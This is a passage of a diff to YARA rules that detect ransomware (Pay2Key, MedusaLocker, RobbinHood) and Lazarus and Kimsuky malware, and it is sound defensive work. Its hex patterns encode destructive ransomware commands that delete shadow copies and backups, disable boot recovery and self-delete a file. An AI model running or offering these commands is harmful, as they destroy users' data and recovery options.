+		$s6 = { 55 50 44 41 54 45 20 25 51 2e 25 73 20 53 45 54 20 73 71 6c 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 20 3d 20 27 74 72 69 67 67 65 72 27 20 54 48 45 4e 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 72 69 67 67 65 72 28 73 71 6c 2c 20 25 51 29 45 4c 53 45 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 61 62 6c 65 28 73 71 6c 2c 20 25 51 29 20 45 4e 44 2c 20 74 62 6c 5f 6e 61 6d 65 20 3d 20 25 51 2c 20 6e 61 6d 65 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 3d 27 74 61 62 6c 65 27 20 54 48 45 4e 20 25 51 20 57 48 45 4e 20 6e 61 6d 65 20 4c 49 4b 45 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 25 25 27 20 41 4e 44 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 54 48 45 4e 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 27 20 7c 7c 20 25 51 20 7c 7c 20 73 75 62 73 74 72 28 6e 61 6d 65 2c 25 64 2b 31 38 29 20 45 4c 53 45 20 6e 61 6d 65 20 45 4e 44 20 57 48 45 52 45 20 74 62 6c 5f 6e 61 6d 65 3d 25 51 20 43 4f 4c 4c 41 54 45 20 6e 6f 63 61 73 65 20 41 4e 44 20 28 74 79 70 65 3d 27 74 61 62 6c 65 27 20 4f 52 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 4f 52 20 74 79 70 65 3d 27 74 72 69 67 67 65 72 27 29 3b }
+		$s7 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 }
+		$s8 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
+}
+rule ARKBIRD_SOLG_Ran_Pay2Key_Nov_2020_1 : FILE
+{
+	meta:
+		description = "Detect Pay2Key ransomware"
+		author = "Arkbird_SOLG"
+		id = "440b8128-4708-54ba-94c3-c0b522004da6"
+		date = "2020-12-01"
+		modified = "2020-12-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-14/Pay2Key/Ran_Pay2Key_Nov_2020_1.yar#L1-L31"
+		license_url = "N/A"
+		logic_hash = "f1ea1ed141ba7a1eaaa34c216adebfacaa23ef8776a0216b778ccb34bd000590"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00"
+		hash2 = "d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467"
+		hash3 = "ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f"
+
+	strings:
+		$s1 = "F:\\2-Sources\\21-FinalCobalt\\Source\\cobalt\\Cobalt\\Cobalt\\Win32\\Release\\Client\\Cobalt.Client.pdb" fullword ascii
+		$s2 = ".\\Cobalt-Client-log.txt" fullword ascii
+		$s3 = ".\\Config.ini" fullword wide
+		$s4 = "Local\\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag" fullword ascii
+		$s5 = "\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" fullword ascii
+		$s6 = { 40 00 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 31 00 2e 00 31 00 2e 00 31 00 2e 00 31 00 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 33 00 30 00 30 00 30 00 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 44 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 }
+		$s7 = "%WINDRIVE%" fullword wide
+		$s8 = "%WINDIR%" fullword wide
+		$dbg1 = "message.txt" fullword ascii
+		$dbg2 = "Failed To Get Data...." fullword ascii
+		$dbg3 = "lock.locked()" fullword wide
+		$dbg4 = { 47 65 74 41 64 61 70 74 65 72 73 49 6e 66 6f 20 66 61 69 6c 65 64 20 77 69 74 68 20 65 72 72 6f 72 3a 20 25 64 0a }
+		$dbg5 = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 74 20 66 61 69 6c 65 64 3a 20 25 78 0a }
+		$dbg6 = { 43 72 79 70 74 44 65 72 69 76 65 4b 65 79 20 66 61 69 6c 65 64 3a 20 25 78 0a 00 00 25 00 64 }
+		$dbg7 = { 5b 2d 5d 20 43 72 79 70 74 45 6e 63 72 79 70 74 20 66 61 69 6c 65 64 0a }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 500KB and ( 5 of ( $s* ) and 4 of ( $dbg* ) )
+}
+rule ARKBIRD_SOLG_RAN_Medusalocker_July_2021_1 : FILE
+{
+	meta:
+		description = "Detect MedusaLocker ransomware"
+		author = "Arkbird_SOLG"
+		id = "7eec35ac-f1ec-596b-8224-ef27e31e841c"
+		date = "2021-07-25"
+		modified = "2021-08-08"
+		reference = "https://twitter.com/r3dbU7z/status/1418433910057353217"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-25/MedusaLocker/RAN_MedusaLocker_July_2021_1.yara#L1-L28"
+		license_url = "N/A"
+		logic_hash = "541665541c07b585a7dfa024f85516b7be94d7d8d76a85e58c8c3b71fd0550ff"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		hash1 = "033b4950a8f249b20eb86ec6f8f2ea0a1567bb164289d1aa7fb0ba51f9bbe46c"
+		hash2 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
+		hash3 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
+		hash4 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
+		tlp = "white"
+		adversary = "RaaS"
+
+	strings:
+		$s1 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 52 00 65 00 73 00 69 00 7a 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 53 00 74 00 6f 00 72 00 61 00 67 00 65 00 20 00 2f 00 66 00 6f 00 72 00 3d 00 ?? 00 3a 00 20 00 2f 00 6f 00 6e 00 3d 00 ?? 00 3a 00 20 00 2f 00 6d 00 61 00 78 00 73 00 69 00 7a 00 65 00 3d }
+		$s2 = { 64 00 65 00 6c 00 20 00 2f 00 73 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 56 00 48 00 44 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 63 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 6b 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 62 00 63 00 61 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 6b 00 66 00 20 00 ?? 00 3a 00 5c 00 42 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 62 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 73 00 65 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 69 00 6e 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 64 00 73 00 6b }
+		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
+		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
+		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
+		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
+		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
+		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
+		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
+		$s10 = { 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 4c 49 53 54 20 4f 46 20 45 4e 43 52 59 50 54 45 44 20 46 49 4c 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 0d 0a }
+		$x1 = { 48 89 5c 24 08 57 48 83 ec 30 48 8b da 48 8b f9 e8 0b fe ff ff 44 8b 43 08 48 8d 47 28 44 2b 03 45 33 c9 48 8b 13 48 8b 4f 20 48 89 44 24 28 c7 44 24 20 00 00 00 00 ff 15 [2] 07 00 85 c0 74 12 c6 47 08 01 48 8b c7 48 8b 5c 24 40 48 83 c4 30 5f c3 ff 15 [2] 07 00 48 8b 5c 24 40 89 47 34 48 8b c7 }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* ) and $x1
+}
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Screencapture_June_2020_1 : FILE
+{
+	meta:
+		description = "Detect ScreenCapture malware used by Lazarus APT"
+		author = "Arkbird_SOLG, James_inthe_box"
+		id = "bb0463ac-6219-5a12-b3d2-fc82800bda69"
+		date = "2020-06-23"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L3-L31"
+		license_url = "N/A"
+		logic_hash = "66f8d3da0f70f6c4ed6f853ab4040d7f96c043e9e194f1720999b48910b3e756"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
+
+	strings:
+		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\ScreenCapture_Win32_DllRelease.pdb" fullword ascii
+		$s2 = "CloseHandle ScreenCaptureMutex failure! %d" fullword ascii
+		$s3 = "ScreenCapture_Win32_DllRelease.dll" fullword ascii
+		$s4 = "ScreenCaptureMutex already created! %s\n" fullword ascii
+		$s5 = "Capturing screen...\n" fullword ascii
+		$s6 = "%s\\P%02d%lu.tmp" fullword ascii
+		$s7 = "ScreenCaptureThread finished!" fullword ascii
+		$s8 = "ScreenCaptureThread started!" fullword ascii
+		$s9 = "ScreenCapture start time set to %llu" fullword ascii
+		$s10 = "ScreenCaptureMutex already created! %s\n" fullword ascii
+		$s11 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
+		$s12 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
+		$s13 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
+		$s14 = "[END] ScreenCaptureThread terminated!" fullword ascii
+		$s15 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
+		$s16 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
+		$s17 = "Entered Windows direcotry, skipping..." fullword ascii
+		$s18 = "Found %d entries." fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 14 of them
+}
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Keylog_June_2020_1 : FILE
+{
+	meta:
+		description = "Detect keylog malware used by Lazarus APT"
+		author = "Arkbird_SOLG, James_inthe_box"
+		id = "dd6aae8c-76d1-514d-905e-21472eb9b9b2"
+		date = "2020-06-23"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L33-L58"
+		license_url = "N/A"
+		logic_hash = "9a4e17903ad2a7c80651aa8f3d57876d1621be06ba7a683135b11929b232b2fa"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
+
+	strings:
+		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\KeyLog_Win32_DllRelease.pdb" fullword ascii
+		$s2 = "CloseHandle KeyLogMutex failure! %d" fullword ascii
+		$s3 = "KeyLog_Win32_DllRelease.dll" fullword ascii
+		$s4 = "Key Log Mutex already created! %s\n" fullword ascii
+		$s5 = "Unable to GetProcAddress of GetAsyncKeyState" fullword ascii
+		$s6 = "KeyLogThread finished!" fullword ascii
+		$s7 = "KeyLogThread started!" fullword ascii
+		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
+		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
+		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
+		$s11 = "[END] KeyLogThread terminated!" fullword ascii
+		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
+		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
+		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
+		$s15 = "Found %d entries." fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
+}
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Generic_June_2020_1 : FILE
+{
+	meta:
+		description = "Detect stealers used by Lazarus APT by common strings"
+		author = "Arkbird_SOLG, James_inthe_box"
+		id = "11a7c531-91a4-524e-aa5d-c11538f7db58"
+		date = "2020-06-23"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L60-L85"
+		license_url = "N/A"
+		logic_hash = "878e4a128b7de45f4940e7adccfeb376ce46e87b35b25e162f668303e9fd7852"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "83292ba7a1ddda6acf32181c693aa85b9e433fcb908a94ebccbed0f407a1a021"
-		hash2 = "512ad244c58064dfe102f27c9ec8814f3e3720593fe1e3ed48a8cb385d52ff84"
-		level = "Experimental"
-		tlp = "white"
-		adversary = "Kimsuky"
+		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
+		hash2 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
 
 	strings:
-		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
-		$s1 = { 78 9c ec bd 6b 97 eb 4a 72 25 f6 57 8e b5 96 67 75 4f 6b 24 f0 25 8f a6 d5 b3 16 59 00 6a c8 19 80 06 86 28 9b 65 d9 b3 7a 58 b7 59 97 3c ea 96 fb 21 92 90 fb bf 3b 76 64 c6 23 93 f5 38 47 6a 8f f5 41 1f ee ba c5 03 12 40 66 46 46 c6 63 c7 8e 7f f8 }
-		$s2 = { 94 fe 9b f1 c7 1f e8 e3 0f f4 f1 87 19 fd 37 ff f9 17 fc db 8f f4 ed e2 e7 5f fe 1b fe ff df 7e fc 8b df fe f0 f7 5f 7f 79 f8 e1 27 7f f9 7f fc 5f cb 7f f7 fc cb 7f 37 16 ff ee af ff f6 67 7f fb 97 7f fb b7 bf f8 3f ff f2 f8 e7 74 e3 9f fe fc cb e5 f5 c7 af 3f 7c f9 c9 8f 5f fe 06 3f f9 fa c3 af 8f bf 7f a5 87 d3 fd e9 26 bf 7f fd f1 }
-		$s3 = { b6 7c 2a db e2 39 ae 67 75 d9 ee 56 ab 7e 27 f2 b5 2e ba 61 3d a5 f5 88 f3 5b 3f f6 b4 b6 6d d1 c9 fb ae 9a 20 93 63 5c cf 69 73 6e a6 dd 4e d6 6b 98 f4 67 92 01 fa 9e 3d 6f 98 f7 95 3c ef eb aa 3f 37 85 bd ef 70 69 c6 ba ea 77 4f }
-		$s4 = { 4d 51 d7 5b 7d de f2 96 c8 0b dd bf d9 2d e9 7d 87 85 ec 87 b6 a4 cf 43 dc 1f 55 37 d2 fd 2b 95 df 20 6f 45 ab e3 e1 eb 24 df 71 ff 40 fe 69 3f }
-		$s5 = { 0f 35 fc 43 53 cf 03 67 d3 85 fb 51 b6 49 5f 40 fa 5d a2 3f 7d 31 fb 0b 3d 6f 53 69 ff 78 aa 37 e8 f3 12 fe 35 3e 43 90 7c 9c e3 73 a6 78 1c 9c 21 ec bf 20 df eb f0 5a b7 76 6f fb ad 96 53 57 0f a4 fc c3 6a f5 6d fe 41 fc 19 ed f7 4f 78 3a e9 1f f8 23 3d 2b 8d 2f 86 79 d6 7b b2 f8 e0 85 f2 51 25 fc 70 8c }
+		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease" fullword ascii
+		$s2 = "Mutex failure! %d" fullword ascii
+		$s3 = "Win32_DllRelease.dll" fullword ascii
+		$s4 = "Mutex already created! %s\n" fullword ascii
+		$s5 = "[END]" fullword ascii
+		$s6 = "Thread finished!" fullword ascii
+		$s7 = "Thread started!" fullword ascii
+		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
+		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
+		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
+		$s11 = "Thread terminated!" fullword ascii
+		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
+		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
+		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
 }
-rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Shellcode_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Robbinhood_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect Kimsuky shellcode used in fake PDF against South Korea"
+		description = "Detect RobbinHood ransomware"
 		author = "Arkbird_SOLG"
-		id = "0b8d514b-82b6-5106-a87a-0890be1850d5"
-		date = "2021-08-03"
-		modified = "2021-08-04"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Shellcode_Aug_2021_1.yara#L1-L23"
+		id = "adaacb06-0738-5d2b-b97e-b9007341f743"
+		date = "2020-11-04"
+		modified = "2020-11-05"
+		reference = "https://twitter.com/joakimkennedy/status/1323957238680178689"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-05/RobbinHood/Ran_RobbinHood_Oct_2020_1.yar#L1-L20"
 		license_url = "N/A"
-		logic_hash = "432ae4d1e61aec51be03edf7767b1f05ea98d7cb7af90372a70f8ae86002f82a"
-		score = 50
-		quality = 75
+		logic_hash = "72d0e9b1e2f6aee8f24125e6e6801329e2fad016f05a94ad65c04874a016d09d"
+		score = 75
+		quality = 67
 		tags = "FILE"
-		hash1 = "7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e"
-		hash2 = "359ab5e0b57da0307ca9472e5b225dcd0f9dc9bf2efd2f15b1ca45b78791b6bc"
-		hash3 = "5ea7a724d99fab3f05f50dccd57db59451334ac8640c532d426df319dad55c9e"
-		level = "Experimental"
-		tlp = "white"
-		adversary = "Kimsuky"
+		hash1 = "7c7ef3ab31ab91a7379bc2e3f32473dfa7adf662d0c640ef994103f6022a092b"
+		hash2 = "f927dd9044d7fa874dc6b98a0f5c9c647f3a9e5393bfe034b425cbf8db93e501"
+		hash2 = "3f56501f764d49723188bb119845fec4f2419a5080b74513fd0734e2a628e754"
 
 	strings:
-		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
-		$s1 = { 48 89 d4 57 e9 6f 22 47 16 ff ec 91 e6 7f a8 20 65 0c 43 db 53 7d e1 b6 }
-		$s2 = { 48 5e 64 35 50 98 b6 9b 63 9b 86 c1 1b f9 7f df f7 ea ea aa a6 31 78 f2 65 77 8e a6 bb }
-		$s3 = { ef a7 2c 5e 96 b8 84 06 66 b8 9e 54 cb 51 80 f1 66 35 65 69 0a 38 c5 35 7e 62 48 a2 18 c4 2b 76 0f ba 00 07 6a 2e c5 e3 71 66 ac 6d 12 f6 95 99 0b 37 a3 6c d1 5f 64 b3 fb 0e a0 8d f5 d9 f3 24 61 e9 18 c9 d9 6a a5 94 48 d3 5f e2 19 93 5a fe 33 99 e7 91 50 f5 8e 6e 5b 1d 07 1e 21 3c 2e 3c 7c bb 55 9f ad 2e 3c 7c 1f 1f }
-		$s4 = { b1 9a 3c f7 ce 9e 51 79 f2 c4 d9 13 3a a9 ee f0 95 3d fa be 86 ad cd ea d1 90 d4 4e 18 3a 51 58 b4 e9 97 b7 48 e5 62 32 36 5b 6c d8 ae a4 d2 1d b6 92 a7 af 67 15 c5 52 96 44 02 51 58 1c c7 1c a5 2f c3 28 d0 cf 56 10 f1 27 fd 1f 7e b7 9e 30 b5 9c e0 60 02 37 9e 44 4c 62 30 cb 36 2a a6 c4 f3 7c f1 5b 9e 25 73 d5 d4 f4 f0 fd 8a 1d 89 e1 9d 31 4b 59 ce 0c 33 b6 ab 4d 3b 5f a7 69 21 a0 42 11 13 f3 70 9f 27 33 b6 58 e7 38 49 2d 97 18 de bf c3 c2 97 35 4c 65 70 61 6a d7 1c 3e 7e f2 04 7e d1 39 bc a3 ad 5b 1e 51 65 0d 70 a5 4a 55 b3 89 d9 71 c7 1b 77 4f 15 41 0e 0a 09 28 ab 0d 14 43 af 55 f4 6c }
-		$s5 = { 91 42 d1 ed c0 be 73 73 3e 35 8f b4 8e 38 f9 97 ba f9 58 d6 8b 37 a8 82 29 e7 4d 35 ea e2 ba 48 e0 61 b5 a4 f6 d4 4b 90 6a 98 89 fb 81 39 8b 3b 18 de dc 9d b7 36 ec d2 f1 51 56 1a 10 d3 b5 6b b4 95 f9 1e 86 97 9c 71 d5 4b 9a fb 0c 89 ec 3c d4 1d ac 51 34 9f 63 4d 51 59 3c b1 11 7a cd 79 a0 7a d6 43 48 52 d6 9a 4f bb 70 9a f6 3d a5 8d 72 37 9c 5b 66 e8 37 b5 48 25 80 74 e3 c7 46 ae 45 47 8e b4 e5 e8 3a 52 cd d3 87 c1 67 27 d7 62 54 6e 52 86 71 c5 c1 9f 2c ee 31 fa 2e c9 6a 7b a0 60 50 9f 16 17 f9 45 cd d9 b5 00 78 e4 6c 6b b5 f2 8e e1 bd 00 7d 74 c5 a5 45 35 0c dc 79 9c 3d 82 6a 86 92 }
+		$seq = { 20 21 3d 20 20 3c 3d 3d 20 61 73 20 20 61 74 20 20 66 70 3d 20 69 73 20 20 6c 72 3a 20 6f 66 20 20 6f 6e 20 20 70 63 3d 20 73 70 3a 20 73 70 3d 25 76 0d 0a 29 20 3d 20 29 20 6d 3d 2b 49 6e 66 2c 20 6e 20 2d 49 6e 66 2e 62 61 74 2e 63 6d 64 2e 63 6f 6d 2e 65 78 65 2f 50 49 44 31 30 36 30 33 31 32 35 3a 20 70 3d 41 43 44 54 41 43 53 54 41 45 44 54 41 45 53 54 41 4b 44 54 41 4b 53 54 41 57 53 54 41 68 6f 6d 41 74 6f 69 43 45 53 54 43 68 61 6d 44 61 73 68 45 45 53 54 47 4f 47 43 4a 75 6c 79 4a 75 6e 65 4c 69 73 75 4d 32 52 74 4d 32 52 7a 4d 32 5a 79 4d 32 63 79 4d 32 64 77 4d 33 42 79 4d 69 61 6f 4d 6f 64 69 4e 33 6f 3d 4e 5a 44 54 4e 5a 53 54 4e 65 77 61 4e 6a 41 79 51 56 4a 44 51 56 5a 51 53 41 53 54 53 74 61 74 54 55 31 54 54 68 61 69 54 6b 56 47 55 46 42 55 57 45 53 54 57 45 78 54 59 32 31 30 59 32 31 6b 59 32 35 6d 59 32 46 69 59 32 46 7a 59 32 4d 3d 59 32 52 34 59 32 52 6d 59 32 52 79 59 32 55 78 59 32 55 79 59 32 56 79 59 32 5a 6e 59 32 5a 77 59 32 5a 79 59 32 64 74 59 32 68 74 59 32 6c 69 59 32 78 7a 59 33 42 70 59 33 42 77 59 33 49 79 59 33 4a 30 59 33 4a 33 59 33 4d 3d 59 33 4e 32 59 33 4e 6f 59 33 4e 73 59 33 4e 79 59 33 4e 7a 59 33 52 6d 59 57 39 70 59 57 46 6a 59 57 49 30 59 57 4a 72 59 57 4e 30 59 57 4e 6f 59 57 4e 77 59 57 4e 79 59 57 52 69 59 57 52 70 59 57 52 77 59 57 52 7a 59 57 56 7a 59 57 6b 3d 59 57 6c 30 59 57 6c 6d 59 57 70 73 59 57 77 3d 59 58 42 71 59 58 42 72 59 58 4a 33 59 58 4e 30 59 58 4e 34 59 58 4e 6a 59 58 4e 6d 59 58 4e 74 59 58 4e 77 59 58 5a 70 59 58 64 6e 59 6d 31 77 59 6d 46 30 59 6d 46 35 59 6d 46 6a 59 6d 46 72 59 6d 46 79 59 6d 4d 32 59 6d 4d 33 59 6d 4e 76 59 6d 52 69 59 6d 5a 6d 59 6d 64 30 59 6d 6c 6e 59 6d 6c 72 59 6d 6c 75 59 6d 74 36 59 6d 74 6d 59 6d 74 77 59 6e 42 33 59 6e 4a 6b 59 6e 4e 68 59 6e 56 77 59 6e 6f 79 59 77 3d 3d 5a 32 38 3d 5a 32 46 74 5a 32 52 69 5a 32 68 76 5a 32 6c 6d 5a 33 42 6e 5a 33 4a 35 5a 33 6f 3d 5a 47 31 77 5a 47 35 6e 5a 47 39 30 5a 47 39 6a 5a 47 46 30 5a 47 46 6a 5a 47 46 7a 5a 47 49 3d 5a 47 49 77 5a 47 49 7a 5a 47 4a 34 5a 47 4a 68 5a 47 4a 6d 5a 47 4d 79 5a 47 4e 6f 5a 47 4e 79 5a 47 4e 7a 5a 47 52 6b 5a 47 52 7a 5a 47 56 74 5a 47 56 79 5a 47 56 7a 5a 47 5a 7a 5a 47 64 6a 5a 47 6c 30 5a 47 6c 6d 5a 47 6c 74 5a 47 6c 77 5a 47 6c 79 5a 47 70 32 5a 48 4a 33 5a 48 4a 6d 5a 48 4e 30 5a 48 4e 69 5a 48 4e 72 5a 48 52 6b 5a 48 64 6d 5a 48 64 6e 5a 48 64 7a 5a 48 68 30 5a 48 68 34 5a 48 68 69 5a 48 68 6d 5a 48 68 6e 5a 57 31 73 5a 57 52 69 5a 58 42 72 5a 58 42 7a 5a 58 4a 6d 5a 58 4e 74 5a 58 68 6d 5a 6d 31 69 5a 6d 39 7a 5a 6d 4a 33 5a 6d 52 69 5a 6d 59 3d 5a 6d 5a 6b 5a 6d 5a 6d 5a 6d 67 3d 5a 6d 68 6b 5a 6d 78 32 5a 6d 78 68 5a 6d 78 6d 5a 6e 42 34 5a 6e 42 72 5a 6e 